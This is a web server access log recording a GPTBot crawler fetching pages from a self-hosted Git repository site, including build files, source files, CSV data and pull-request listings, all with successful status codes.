https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 10989] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11015] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11015] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11015] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:17:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt?display=rendered" [Client 74.7.227.38] [Length 11129] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:17:45:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=PythonTest" [Client 74.7.227.38] [Length 50452] [Gzip 8.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" +[17/Feb/2026:17:45:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old?display=rendered" [Client 74.7.227.38] [Length 10937] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:17:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:17:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec?display=source" [Client 74.7.227.38] [Length 12507] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:17:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec?display=source" [Client 74.7.227.38] [Length 12259] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:17:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug%2fnet8.0%2fOpcConnectionTest.assets.cache" [Client 74.7.227.38] [Length 20644] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.assets.cache" +[17/Feb/2026:17:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/labels?sort=mostissues&state=" [Client 74.7.227.38] [Length 7651] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/labels" +[17/Feb/2026:17:45:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11078] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:17:45:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11076] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:17:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp" +[17/Feb/2026:17:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11077] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:17:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:17:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md?display=source" [Client 74.7.227.38] [Length 16016] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md" +[17/Feb/2026:17:45:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:17:45:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12024] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:45:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:17:45:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12024] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12026] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11111] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:17:45:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:45:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:17:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 11996] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12026] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:17:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:17:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2f%ed%95%84%ec%9a%94%20Linux%eb%aa%85%eb%a0%b9%eb%93%a4%20%eb%aa%a8%ec%9d%8c.md" [Client 74.7.227.38] [Length 25126] [Gzip 3.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:17:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/nos_setup.exe?display=rendered" [Client 74.7.227.38] [Length 11034] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/nos_setup.exe" +[17/Feb/2026:17:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv?display=source" [Client 74.7.227.38] [Length 11613] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv" +[17/Feb/2026:17:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv?display=rendered" [Client 74.7.227.38] [Length 11325] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/user_assets.csv" +[17/Feb/2026:17:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py?display=rendered" [Client 74.7.227.38] [Length 11107] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py" +[17/Feb/2026:17:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv?display=source" [Client 74.7.227.38] [Length 11622] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv" +[17/Feb/2026:17:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:17:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11111] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:17:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv?display=source" [Client 74.7.227.38] [Length 11460] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:17:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py?display=source" [Client 74.7.227.38] [Length 12785] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py" +[17/Feb/2026:17:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" 